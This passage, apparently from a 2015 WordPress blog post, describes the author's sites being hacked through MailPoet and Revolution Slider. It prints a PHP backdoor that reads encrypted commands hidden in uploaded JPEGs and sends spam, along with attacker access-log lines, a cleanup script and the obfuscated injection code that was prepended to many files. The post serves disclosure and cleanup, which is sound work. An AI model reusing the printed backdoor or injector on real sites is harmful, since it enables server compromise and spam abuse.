=> ‘application/octet-stream’, ‘oda’ => ‘application/oda’, ‘pdf’ => ‘application/pdf’, ‘ai’ => ‘application/postscript’, ‘eps’ => ‘application/postscript’, ‘ps’ => ‘application/postscript’, ‘smi’ => ‘application/smil’, ‘smil’ => ‘application/smil’, ‘mif’ => ‘application/vnd.mif’, ‘xls’ => ‘application/vnd.ms-excel’, ‘ppt’ => ‘application/vnd.ms-powerpoint’, ‘wbxml’ => ‘application/vnd.wap.wbxml’, ‘wmlc’ => ‘application/vnd.wap.wmlc’, ‘dcr’ => ‘application/x-director’, ‘dir’ => ‘application/x-director’, ‘dxr’ => ‘application/x-director’, ‘dvi’ => ‘application/x-dvi’, ‘gtar’ => ‘application/x-gtar’, ‘php3’ => ‘application/x-httpd-php’, ‘php4’ => ‘application/x-httpd-php’, ‘php’ => ‘application/x-httpd-php’, ‘phtml’ => ‘application/x-httpd-php’, ‘phps’ => ‘application/x-httpd-php-source’, ‘swf’ => ‘application/x-shockwave-flash’, ‘sit’ => ‘application/x-stuffit’, ‘tar’ => ‘application/x-tar’, ‘tgz’ => ‘application/x-tar’, ‘xht’ => ‘application/xhtml+xml’, ‘xhtml’ => ‘application/xhtml+xml’, ‘zip’ => ‘application/zip’, ‘mid’ => ‘audio/midi’, ‘midi’ => ‘audio/midi’, ‘mp2’ => ‘audio/mpeg’, ‘mp3’ => ‘audio/mpeg’, ‘mpga’ => ‘audio/mpeg’, ‘aif’ => ‘audio/x-aiff’, ‘aifc’ => ‘audio/x-aiff’, ‘aiff’ => ‘audio/x-aiff’, ‘ram’ => ‘audio/x-pn-realaudio’, ‘rm’ => ‘audio/x-pn-realaudio’, ‘rpm’ => ‘audio/x-pn-realaudio-plugin’, ‘ra’ => ‘audio/x-realaudio’, ‘wav’ => ‘audio/x-wav’, ‘bmp’ => ‘image/bmp’, ‘gif’ => ‘image/gif’, ‘jpeg’ => ‘image/jpeg’, ‘jpe’ => ‘image/jpeg’, ‘jpg’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘eml’ => ‘message/rfc822’, ‘css’ => ‘text/css’, ‘html’ => ‘text/html’, ‘htm’ => ‘text/html’, ‘shtml’ => ‘text/html’, ‘log’ => ‘text/plain’, ‘text’ => ‘text/plain’, ‘txt’ => ‘text/plain’, ‘rtx’ => ‘text/richtext’, ‘rtf’ => ‘text/rtf’, ‘vcf’ => ‘text/vcard’, ‘vcard’ => ‘text/vcard’, ‘xml’ => ‘text/xml’, ‘xsl’ => ‘text/xml’, ‘mpeg’ => ‘video/mpeg’, ‘mpe’ => ‘video/mpeg’, ‘mpg’ => ‘video/mpeg’, ‘mov’ => ‘video/quicktime’, ‘qt’ => ‘video/quicktime’, ‘rv’ => ‘video/vnd.rn-realvideo’, ‘avi’ => ‘video/x-msvideo’, ‘movie’ => ‘video/x-sgi-movie’ ); return (array_key_exists(strtolower($ext), $mimes) ? $mimes[strtolower($ext)]: ‘application/octet-stream’); } public static function filenameToType($filename) { // In case the path is a URL, strip any query string before getting extension $qpos = strpos($filename, ‘?’); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $pathinfo = self::mb_pathinfo($filename); return self::_mime_types($pathinfo[‘extension’]); } public static function mb_pathinfo($path, $options = null) { $ret = array(‘dirname’ => ”, ‘basename’ => ”, ‘extension’ => ”, ‘filename’ => ”); $pathinfo = array(); if (preg_match(‘%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im’, $path, $pathinfo)) { if (array_key_exists(1, $pathinfo)) { $ret[‘dirname’] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret[‘basename’] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret[‘extension’] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret[‘filename’] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case ‘dirname’: return $ret[‘dirname’]; case PATHINFO_BASENAME: case ‘basename’: return $ret[‘basename’]; case PATHINFO_EXTENSION: case ‘extension’: return $ret[‘extension’]; case PATHINFO_FILENAME: case ‘filename’: return $ret[‘filename’]; default: return $ret; } } public function set($name, $value = ”) { try { if (isset($this->$name)) { $this->$name = $value; } else { throw new phpmailerException($this->lang(‘variable_set’) . $name, self::STOP_CRITICAL); } } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($exc->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function secureHeader($str) { return trim(str_replace(array(“\r”, “\n”), ”, $str)); } public static function normalizeBreaks($text, $breaktype = “\r\n”) { return preg_replace(‘/(\r\n|\r|\n)/ms’, $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ”; for ($i = 0; $i < strlen($txt); $i++) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line .= $txt[$i]; } else { $line .= ‘=’ . sprintf(‘%02X’, $ord); } } return $line; } public function DKIM_Sign($signHeader) { if (!defined(‘PKCS7_TEXT’)) { if ($this->exceptions) { throw new phpmailerException($this->lang(‘signing’) . ‘ OpenSSL extension missing.’); } return ”; } $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != ”) { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($signHeader, $signature, $privKey)) { return base64_encode($signature); } return ”; } public function DKIM_HeaderC($signHeader) { $signHeader = preg_replace(‘/\r\n\s+/’, ‘ ‘, $signHeader); $lines = explode(“\r\n”, $signHeader); foreach ($lines as $key => $line) { list($heading, $value) = explode(‘:’, $line, 2); $heading = strtolower($heading); $value = preg_replace(‘/\s+/’, ‘ ‘, $value); // Compress useless spaces $lines[$key] = $heading . ‘:’ . trim($value); // Don’t forget to remove WSP around the value } $signHeader = implode(“\r\n”, $lines); return $signHeader; } public function DKIM_BodyC($body) { if ($body == ”) { return “\r\n”; } // stabilize line endings $body = str_replace(“\r\n”, “\n”, $body); $body = str_replace(“\n”, “\r\n”, $body); // END stabilize line endings while (substr($body, strlen($body) – 4, 4) == “\r\n\r\n”) { $body = substr($body, 0, strlen($body) – 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = ‘rsa-sha1’; // Signature & hash algorithms $DKIMcanonicalization = ‘relaxed/simple’; // Canonicalization of header/body $DKIMquery = ‘dns/txt’; // Query method $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 – Jan 1, 1970 (UTC time zone) $subject_header = “Subject: $subject”; $headers = explode($this->LE, $headers_line); $from_header = ”; $to_header = ”; $current = ”; foreach ($headers as $header) { if (strpos($header, ‘From:’) === 0) { $from_header = $header; $current = ‘from_header’; } elseif (strpos($header, ‘To:’) === 0) { $to_header = $header; $current = ‘to_header’; } else { if ($current && strpos($header, ‘ =?’) === 0) { $current .= $header; } else { $current = ”; } } } $from = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($from_header)); $to = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($to_header)); $subject = str_replace( ‘|’, ‘=7C’, $this->DKIM_QP($subject_header) ); // Copied header fields (dkim-quoted-printable) $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); // Length of body $DKIMb64 = base64_encode(pack(‘H*’, sha1($body))); // Base64 of packed binary SHA-1 hash of body $ident = ($this->DKIM_identity == ”) ? ” : ‘ i=’ . $this->DKIM_identity . ‘;’; $dkimhdrs = ‘DKIM-Signature: v=1; a=’ . $DKIMsignatureType . ‘; q=’ . $DKIMquery . ‘; l=’ . $DKIMlen . ‘; s=’ . $this->DKIM_selector . “;\r\n” . “\tt=” . $DKIMtime . ‘; c=’ . $DKIMcanonicalization . “;\r\n” . “\th=From:To:Subject;\r\n” . “\td=” . $this->DKIM_domain . ‘;’ . $ident . “\r\n” . “\tz=$from\r\n” . “\t|$to\r\n” . “\t|$subject;\r\n” . “\tbh=” . $DKIMb64 . “;\r\n” . “\tb=”; $toSign = $this->DKIM_HeaderC( $from_header . “\r\n” . $to_header . “\r\n” . $subject_header . “\r\n” . $dkimhdrs ); $signed = $this->DKIM_Sign($toSign); return $dkimhdrs . $signed . “\r\n”; } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = ‘‘ . $this->getMessage() . “
\n”; return $errorMsg; } } ///////////////////////////////////////////////////////////////// function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type, $config_file) { $mail = new PHPMailer(); $mail->isMail(); $mail->CharSet = ‘utf-8’; $mail->SetFrom($from_email, $from_name); $mail->AddAddress($to); $mail->Subject = $subject; if ($type == “1”) { $mail->MsgHTML($body); } elseif ($type == “2”) { $mail->isHTML(false); $mail->Body = $body; } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if ($file[‘tmp_name’] != $config_file) { $mail->addAttachment($file[‘tmp_name’], $file[‘name’]); } } } if (!$mail->send()) { return $mail->ErrorInfo; } else { return 0; } } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if(strpos($file[‘name’], “.jpg”)) { $res = type1_send($file[‘tmp_name’]); if ($res) { echo $res; } } } } function myhex2bin( $str ) { $sbin = “”; $len = strlen( $str ); for ( $i = 0; $i < $len; $i += 2 ) { $sbin .= pack( “H*”, substr( $str, $i, 2 ) ); } return $sbin; } function decode($data, $key) { $out_data = “”; for ($i=0; $i<strlen($data);) { for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function type1_send($config_file) { $data = file_get_contents($config_file); $start_pos = strpos($data, myhex2bin(“ffda”)); if ($start_pos) { $start_pos += (20); $end_pos = strrpos($data, myhex2bin(“ffd9”)); if ($end_pos) { $data = substr($data, $start_pos, $end_pos); } else { return FALSE; } } else { return FALSE; } $key = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]; $data = decode($data, $key); $data = @unserialize($data); if (!$data || !isset($data[‘ak’])) { return FALSE; } if ($data[‘ak’] != “328c9145-576b-4a72-9ef0-5d38810eaf66”) { exit(); } if (isset($data[‘c’])) { $res[“r”][“c”] = $data[‘c’]; return base64_encode(serialize($res)); } $good = 0; $bad = 0; $last_error = 0; foreach ($data[‘e’] as $uid=>$email) { $theme = $data[‘s’][array_rand($data[‘s’])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data[‘l’]; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data[‘f’][array_rand($data[‘f’])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, “[CUSTOM]”) == FALSE) { $from = from_host($from); } else { $from = str_replace(“[CUSTOM]”, “”, $from); } $from_email = explode(“<“, $from); $from_email = explode(“>”, $from_email[1]); $from_name = explode(“\””, $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data[‘lt’], $config_file); if ($last_error === 0) { $good++; } else { $bad++; $good = count($data[‘e’]) – $bad; } } $res[“r”][“e”] = $last_error === FALSE ? 0 : $last_error; $res[“r”][“g”] = $good; $res[“r”][“b”] = $bad; return base64_encode(serialize($res)); }

Some log to explain the initialization steps:

146.185.239.53 - - [05/Feb/2015:10:26:20 +0100] "POST /wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:41 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4"
146.185.239.53 - - [06/Feb/2015:02:34:44 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18694 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:47 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0"
146.185.239.53 - - [06/Feb/2015:02:34:48 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:49 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18713 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:51 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18738 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

http://whois.domaintools.com/146.185.239.53



Update


A very useful (and easy) script to cleanup your site:


<?php

/**
 * A script to cleanup a hacked WordPress site.
 *
 * It needs shouold be run in the public site's root directory
 */

$files = array();

$it = new RecursiveDirectoryIterator(dirname(__FILE__));
$display = Array ( 'php' );
foreach(new RecursiveIteratorIterator($it) as $file)
{
    if (in_array(strtolower(array_pop(explode('.', $file))), $display))
        $files[] = $file->getRealPath();
}

foreach($files as $file){
	if ($file) {
		$fileArr = file($file);
		$hack_pos = strpos($fileArr[0], 'GLOBALS');
		if ($hack_pos !== false) {
			echo "f: $file\n\n";
			$orig_pos = strpos($fileArr[0], '; ?>', $hack_pos);
			$first_line = $orig_pos !== false ? substr($fileArr[0], $orig_pos + 4) : '';
			$fileArr[0] = $first_line;
			file_put_contents($file, join("\n", $fileArr));
		}
	}
}

?>

wordpress-hack

5 febbraio 2015
di max
0 commenti

WordPress and multiple malwares

5.00 avg. rating (93% score) - 1 vote

Thanks to MailPoet and Revolution Slider my websites run over multiple attaks.

I noticed problems mainly because, when I enter in the plugins’ list, a lot of errors like “Plugin ABC deactivated..” come out.
This because the plugin main file was not starting with its regular comment, but with the malevolent code.

A lot of files (1000+) was starting like this

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jfdbjfrkuo = 'g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+5%x5c%x7878:-!%x5c%x7825tzw%x5c%xx5c%x7825o:!>!%x5c%x78242178}527}88:}334}467]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]6gP7L6M7]D4]275]D:M8]Df#<%x5)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%27pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#z5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93eps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7]37]278]225]241]334]368]322]3]364]6]225j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH25bss-%x5c%x7825r%x5c%x7878B%xx5c%x7825ww2)%x5c%x7825%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x6c%x7827,*d%x5c%x7827,*ct%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%7822!pd%x5c%x7825)!gj}Z;h!opjudovc%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x78782fq%x5c%x7825>U<#16,4doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fm5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%c%x7825bG9}:}.}-}!#*<%x5cbssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%%x21%50%x5c%x7825%x5c%x7878:!>#]yM#-#[#-#Y#-#D#-#W#-#C#-#OK)ftpmdXA6|7**197-2qj%x5c%x7825%x5c%x782f#)rrd%x5c%x#-#N#*%x5c%x7824%x5c%x782f%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x78!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvu878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<%x7825!|!*#91y]c9y]g2y]#>>*4-1-bub)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x72f#00#W~!%x5c%x7825t2wy]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825x5c%x7825:|:*r%x5c%x7825:-x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5d!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x78d%x5c%x7825w6Z6<.5%x:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K47825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x782UTPI%x5c%x7860QUUI&e_SEx5c%x7825:<#64y]552]e7fsX%x5c%x7827u%x5c%x7825)7f8:|:7#6#)tutjyf%x5c%x786043927sfvr#%x5c%x785cq%x5c%x78257%x5c%x782f%x7825!-#1]#-bubE{h%x5c%x7825)tpqsutx7825<#762]67y]562]38y]572]48y]#>m%%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bb6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x782y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%xx5c%x7824*!|!%x5c%x7824-%5c%x7825w:!>!%x5c%x78246767~6<Cw6<p;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5cc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x787-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%xjojR%x5c%x7827id%x5c%x78256<%x5c%x78*0f(-!#]y76]277]y72]265]y39782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#7R57,27R66,#%x5c%x782fq%fs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5cx7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%; function fjfgg($n){return chr(ord($n)-1);} @er#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x78x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!5c%x7825)323ldfidk!~!<**qp%x5c%x78EB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x%x782f#00#W~!Ydrr)%x5c%x7825825tww**WYsboepn)%x5c%x78c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj60]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%!gj!|!*1?hmg%x5c%x78r%x5c%x7878Bsfuvso!sboepn)%x5fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x78274%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;m%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f4]275]y83]273]y76]277#<%x5c%x7825t2w>#tmfV%x5c%x787f<*X&Z&S{ftmx5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^72%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]25)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuD6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]yc%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idu9]252]y83]273]y72]282x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5x7822#)fepmqyfA>2b%x5c%x7825!<%73", NULL); }bn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x72f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x_GMFT%x5c%x7860QIQ&f_jgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787judovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7fw6*%x5c%x787f_*#ujojRk3%x5c%x78]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%xtr.984:75983:48984:71]K9]77]D4]82]K6]mji%x5c%x78786<C%x5c%x7827&6<*rfs]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]6ft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>824!>!tus%x5c%x7860sf25!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787fg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!o785c2^-%x5c%x7825hOh%x5c%x78!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x55c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gc%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825E{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnp*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%>%x5c%x782f7rfs%x5c%x78256<#o58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpecsboe))1%x5c%x782f35.)1%x5c%x78}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!op5wN;#-Ez-1H*WCw*[!%x5c%x7825rN}%x7824-%x5c%x7824y4%x5c%x7824-%x5c%%x7825-qp%x5c%x7825)54l%x7827{**u%x5c%x7825-#jt0}Z;zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y762f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%<^#Y#%x5c%x785cq%x5c%x7825%x5c%825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT52]y74]256#<!%x5c%x7825ff2!>!#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!134%x78%62%x35%165%x3a%146%x21%76#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x77860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubx5c%x7824%x5c%x785c%x5c%x7825jc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]%x78256<C>^#zsfvr#%x5c%x785cq%x55ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:fV%x5c%x787f<*XAZASV<*w%x5c%x7825c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)37825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]dbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%fsdXA%x5c%x7827K6<%x5c%x787fw.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c83]427]36]373P6]36]73]83]238M7]381]211M5]B%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%xsvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5cx782f#0#%x5c%x782f*#npdc%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%xsv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)u60{666~6<&w6<%x5c%x787fw6*CW&)7gj6<ror_reporting(0); preg_replace("%x2f%50%x2e72]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)32325)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5cx5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x786022)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5cx7827Y%x5c%x78256<.msv%xqmbdf)%x5c%x7825%x5c5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7#]y81]273]y76]258]y6fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)eb23zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*7,18R#>q%x5c%x7825V<*#fopoV!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%xALS["%x61%156%x75%156%x61"])))) { 